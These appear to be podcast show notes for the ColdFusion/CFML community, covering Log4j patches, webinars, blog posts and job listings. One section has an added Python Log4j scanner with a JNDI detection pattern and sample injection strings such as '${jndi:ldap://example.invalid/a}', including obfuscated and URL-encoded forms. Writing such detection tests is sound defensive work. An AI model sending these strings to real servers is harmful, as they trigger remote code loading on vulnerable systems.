Patreon Support
We have 37 patrons providing 97% of the funding for our Modernize or Die podcasts via our Patreon site:
https://www.patreon.com/ortussolutions.
News and Events
Upcoming Ortus Webinar - cbwire + Alpine.js with Grant Copley
January 28, 2022 - 11:00 AM CT - Central Time (US and Canada)
In this webinar, Grant, lead developer for cbwire, will showcase how to build modern, reactive CFML apps easily using very little JavaScript.
Register today:
https://www.ortussolutions.com/events/webinars
Log4j Updates
Log4j 2.17.1 patch released. CommandBox images updated with the latest Log4j patched jars.
Adobe has an updated technote:
https://helpx.adobe.com/coldfusion/kb/log4j-2-17-0-vulnerability-coldfusion.html
Other libraries like Spreadsheet-CFML have updated as well.
Note: Log4j2 support in Lucee 5.3 is coming along for 5.3.9.
‘Elephant Beetle’ Lurks for Months in Networks
The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.
This beetle adores Java. The group is “highly proficient” with Java-based attacks and often targets legacy Java apps running on Linux machines – primarily, the Java-based web servers WebSphere and WebLogic – as a means of initial entry to a target environment, the researchers explained. Beyond that, Elephant Beetle even deploys its own, complete Java web application to do the gang’s bidding on compromised machines that are, meanwhile, chugging along, running legitimate apps.
https://threatpost.com/elephant-beetle-months-networks-financial/177393/?fbclid=IwAR0ytUYx0IOxiNXIUE1jHvqDV0ltP_hBf7XCdEyLEYHfSaKadwf01xPkHLI
Adobe Workshops
More Adobe #ColdFusion Workshops announced, led by Damien Bruyndonckx
2 dates announced:
February 2, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
March 09, 2022
9.00 AM - 4.30 PM CET
1.30 PM - 9.00 PM IST
https://cf-workshop.meetus.adobeevents.com/
AngularJS EOL’ed 12/31/2021
As AngularJS is faced with an uncertain future, many teams are searching for answers to the current hot topic: if you are using AngularJS, do you continue to maintain your AngularJS applications or do you migrate your applications to another framework? This is not an easy (or cheap) question to answer.
In this article, we’ll go over some of the reasons why you should consider migrating your AngularJS applications, and some ideas on how to plan and budget for a successful migration.
https://www.thisdot.co/blog/why-you-should-consider-migrating-from-angularjs-to-vue
CFCasts Content Updates
https://www.cfcasts.com
Just Released
Send your suggestions at
https://cfcasts.com/support
Conferences and Training
VueJS Nation Conference
Online Live Event
January 26th & 27th 2022
Register for Free
https://vuejsnation.com/
More conferences
Need more conferences? This site has a huge list of conferences for almost any language/community.
https://confs.tech/
Blogs, Tweets and Videos of the Week
Tweet - Adam Cameron - TIL something new about CFOUTPUT
I cannot go into details of why this is a good find, but I was unaware that one can pass an encoding algorithm name like `<cfoutput encodefor="html">` (and a bunch of others) which will automatically escape the values in `#expression#`. Didn't know that.
https://cfdocs.org/cfoutput
https://twitter.com/adam_cameron/status/1480624980668915716
https://twitter.com/adam_cameron
Tweet - James Moberg - Microsoft taking log4j stuff seriously.
While performing some #coldfusion unit testing to identify #log4j exploit attempts (that my WAF may miss), I had to obfuscate the test strings or @msftsecurity would instantly quarantine & report the script. It's good to see that Microsoft is taking this seriously. #cfml
https://twitter.com/gamesover/status/1476347523245694984
https://twitter.com/gamesover
Blog - James Moberg - Log4j Exploit Pattern Detection Using ColdFusion/CFML
Here are my initial attempts at trying to detect Log4j exploit attempts that may make it past our WAF/service provider protections. While our WAF stopped requests from Trend Micro's Log4j Tester, obfuscated requests made it through. At the time of testing, Azure wasn't blocking requests. I had to be a little careful with the script as Windows kept instantly quarantining the CFM files and prevented ColdFusion from executing the template.
2021-12-29: Updated rules based on Google Cloud article to additionally block rmi, ldaps & dns (in addition to stripping whitespace.)
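As an added example (not James Moberg's CFML from the post; written in Python so it runs stand-alone), a request check that applies the rules the post describes: strip whitespace, match case-insensitively, and flag JNDI lookups for ldap, ldaps, rmi and dns. The URL-decoding step, the field names and the sample requests are my assumptions, not taken from the post.

```python
import re
from urllib.parse import unquote

# Lookup schemes the post blocks after its 2021-12-29 update: ldap plus rmi, ldaps and dns.
JNDI_SCHEMES = ("ldap", "ldaps", "rmi", "dns")
# Applied to the normalized value, so "${jndi:ldap:" and "${ JNDI : LDAP :" reduce to one form.
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:" + "|".join(JNDI_SCHEMES) + r"):")


def normalize(value: str) -> str:
    """Strip whitespace and case after URL-decoding (decoding is my addition, not the post's rule)."""
    decoded = value
    for _ in range(3):  # bounded loop: double-encoded input still gets decoded
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return re.sub(r"\s+", "", decoded).lower()


def looks_like_jndi_lookup(value: str) -> bool:
    """True when the value contains a JNDI lookup for one of the listed schemes."""
    return JNDI_PATTERN.search(normalize(value)) is not None


def scan_request(headers: dict, query: dict) -> list:
    """Return the names of header/query fields that carry a JNDI lookup, in the order seen."""
    hits = []
    for name, value in list(headers.items()) + list(query.items()):
        if looks_like_jndi_lookup(str(value)):
            hits.append(name)
    return hits


# Constructed sample requests (not captured traffic); hosts use the reserved .invalid TLD.
SAMPLE_REQUESTS = [
    ({"User-Agent": "Mozilla/5.0"}, {"q": "coldfusion log4j 2.17.1"}),
    ({"User-Agent": "${jndi:ldap://example.invalid/a}"}, {}),
    ({"X-Forwarded-For": "${ JNDI : rmi://example.invalid/x }"}, {}),
    ({"User-Agent": "curl/7.79"}, {"id": "%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fy%7D"}),
]

if __name__ == "__main__":
    for headers, query in SAMPLE_REQUESTS:
        hits = scan_request(headers, query)
        print("BLOCK" if hits else "allow", hits)
```

In a CFML template the same check would run over the request headers and form/url scopes before the template does any further processing, logging the field name that matched rather than the raw value.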
https://dev.to/gamesover/log4j-exploit-pattern-detection-using-coldfusioncfml-4l17
Tweet - Zac Spitzer - Show some love for the VS Code CFML Extension
Awesome to see some activity on the vscode-cfml extension, a new minor release coming soon.
If you use it, please show some love and star the repo
https://github.com/KamasamaK/vscode-cfml #lucee #coldfusion #cfml
https://twitter.com/zackster/status/1476206001384828929
https://twitter.com/zackster
Blog - Ben Nadel - Building An API Client With The fetch() API In JavaScript
In my continued effort to modernize this blog, I'm thinking about trying to replace the jQuery library with more modern techniques. I don't personally have anything against jQuery; but, by replacing it, I'll have an opportunity to learn newer - and hawter - JavaScript APIs (at the expense of robust browser support). Case in point, I want to replace the jQuery.ajax() method with a fetch()-based API client. I've never used the fetch() method before; so, this will be an exciting exploration!
When consuming an API, you should always create an API client…
https://www.bennadel.com/blog/4179-building-an-api-client-with-the-fetch-api-in-javascript.htm
Blog - Ben Nadel - Showing A Comment Preview As You Type On This Blog
Since comments, on this blog, are authored using Markdown (and ColdFusion), there is a delta between what you write in the intake form and what is eventually rendered in the HTML. Much of the time, this delta is expected; however, if you have small errors in your markdown syntax, you can end up with HTML that does not reflect what you had intended to publish. To help narrow the gap between input and output, I've added a comment preview functionality to this blog.
https://www.bennadel.com/blog/4178-showing-a-comment-preview-as-you-type-on-this-blog.htm
Blog - Ben Nadel - Mitigating Cross-Site Scripting (XSS) Attacks With A Strict Content Security Policy (CSP) In ColdFusion 2021
As I continue to evolve my blogging platform, bringing it into the modern ColdFusion era, I'm trying to catch up on best practices. Of course, I've always used SQL query parameterization to block SQL injection attacks. And, I use encodeForHtml() and encodeForHtmlAttribute() in as many places as is feasible. And when converting user-provided markdown into HTML, I use the OWASP Anti-Samy project to sanitize the HTML output. But, one thing I've never had is a Content Security Policy (CSP). A CSP is yet another line-of-defense in the war against Cross-Site Scripting (XSS) attacks.
CAUTION: I Am Not A Security Expert
https://www.bennadel.com/blog/4176-mitigating-cross-site-scripting-xss-attacks-with-a-strict-content-security-policy-csp-in-coldfusion-2021.htm
Blog - Ben Nadel - preserveCaseForStructKey Doesn't Work Inside Application.cfc In Adobe ColdFusion 2021
Over the New Year's holiday, I ran into a rather peculiar behavior regarding the preservation of key-casing and the serializeJson() function in Adobe ColdFusion 2021. It appears that the serialization setting for preserveCaseForStructKey doesn't apply to code that resides physically within the Application.cfc life-cycle event handlers. To demonstrate this, we can set up a simple demo in which we serialize data across the event handlers and then dump-out the response:
https://www.bennadel.com/blog/4175-preservecaseforstructkey-doesnt-work-inside-application-cfc-in-adobe-coldfusion-2021.htm
Blog - Ben Nadel - Posting Comments Using Reply Emails And Postmark's Inbound Streams In ColdFusion 2021
I've been a very happy Postmark customer for the last decade. Their SMTP and API services make sending and receiving emails absurdly simple. And, their Inbound webhooks allow you to treat Postmark as a reverse proxy that transforms inbound email delivery into API calls (webhooks) against your own servers. I've been wanting to use this feature on my blog forever; however, I was always afraid that it would lead to massive abuse. That said, in response to a recent spam attack, I was forced to add comment moderation. Which means, I can safely start playing with reply-based comment posting using Postmark's Inbound stream!
https://www.bennadel.com/blog/4174-posting-comments-using-reply-emails-and-postmarks-inbound-streams-in-coldfusion-2021.htm
Blog - Ben Nadel - Centralizing The Error Response Handling For My ColdFusion Blog
If you've noticed that my blog has been quite quiet over the last few weeks, it's because I've dedicated December to modernizing and upgrading my blogging infrastructure. The refactoring has been extensive, to say the least; and, on the list of things that I've wanted to do for a long time is centralizing my error response handling in my ColdFusion code. It took me several days to find, factor-out, and normalize my errors; but, I think I have it at a point that I can easily refine and evolve going forward.
https://www.bennadel.com/blog/4173-centralizing-the-error-response-handling-for-my-coldfusion-blog.htm
CFML Jobs
Several positions available on
https://www.getcfmljobs.com/
Listing over 256 ColdFusion positions from 111 companies across 131 locations in 5 Countries.
7 new jobs listed
Contract - CFML Developer at Remote - United States
Jan 11
https://www.getcfmljobs.com/viewjob.cfm?jobid=11407
Full-Time - Software Developer - ColdFusion at Overland Park, KS - United States
Jan 11
https://www.getcfmljobs.com/jobs/index.cfm/united-states/Software-Developer-ColdFusion-at-Overland-Park-KS/11406
Full-Time - IT Engineer Applications (Coldfusion developer/admin) : 19-0.. - United States
Jan 11
https://www.getcfmljobs.com/jobs/index.cfm/united-states/IT-Engineer-Applications-Coldfusion-developeradmin-1905340-at-Portland-OR/11405
Full-Time - Senior Coldfusion Developer |LATAM| at Colon, PA - United States
Jan 11
https://www.getcfmljobs.com/jobs/index.cfm/united-states/Senior-Coldfusion-Developer-LATAM-at-Colon-PA/11404
Full-Time - ColdFusion Developer at Virtual, US - United States
Jan 10
https://www.getcfmljobs.com/jobs/index.cfm/united-states/ColdFusionDev-US/11403
Full-Time - Remote Software Developer (Cold Fusion) at Mississauga, ON - Canada
Dec 31
https://www.getcfmljobs.com/jobs/index.cfm/canada/Remote-CFDev-at-ON-CA/11401
Full-Time - Fresh Software Engineer ( For ColdFusion Only) at Ahmedabad,.. - India
Dec 30
https://www.getcfmljobs.com/jobs/index.cfm/india/Fresh-Software-Engineer-For-ColdFusion-Only-at-Ahmedabad-Gujarat/11402
ForgeBox Module of the Week
JSON-Diff
By Scott Steinbeck
A ColdFusion utility for checking if 2 JSON objects have differences.
Call JSONDiff.diff to get a detailed list of changes made between the JSON objects.
Call JSONDiff.isSame to get a simple boolean true or false.
https://www.forgebox.io/view/jsondiff
VS Code Hint Tips and Tricks of the Week
Excel Viewer
If you’re working with data, there’s a high chance that you’ll also encounter an Excel spreadsheet in some form. Excel Viewer makes it easy to deal with Excel data in your VS Code editor by formatting long, comma-separated strings into a table layout. This can work wonders for your .csv, .tsv, and .tab files.
https://marketplace.visualstudio.com/items?itemName=GrapeCity.gc-excelviewer
Funny link:
https://twitter.com/dawntraoz/status/1479490317766336518
Thank you to all of our Patreon Supporters
These individuals are personally supporting our open source initiatives to ensure that great tooling like CommandBox, ForgeBox, ColdBox, ContentBox, TestBox and all the other boxes keeps getting the continuous development it needs, and to fund the cloud infrastructure our community relies on, like ForgeBox for our package management with CommandBox.
You can support us on Patreon here:
https://www.patreon.com/ortussolutions
Now offering Annual Memberships: pay for the year and save 10%. Great for businesses.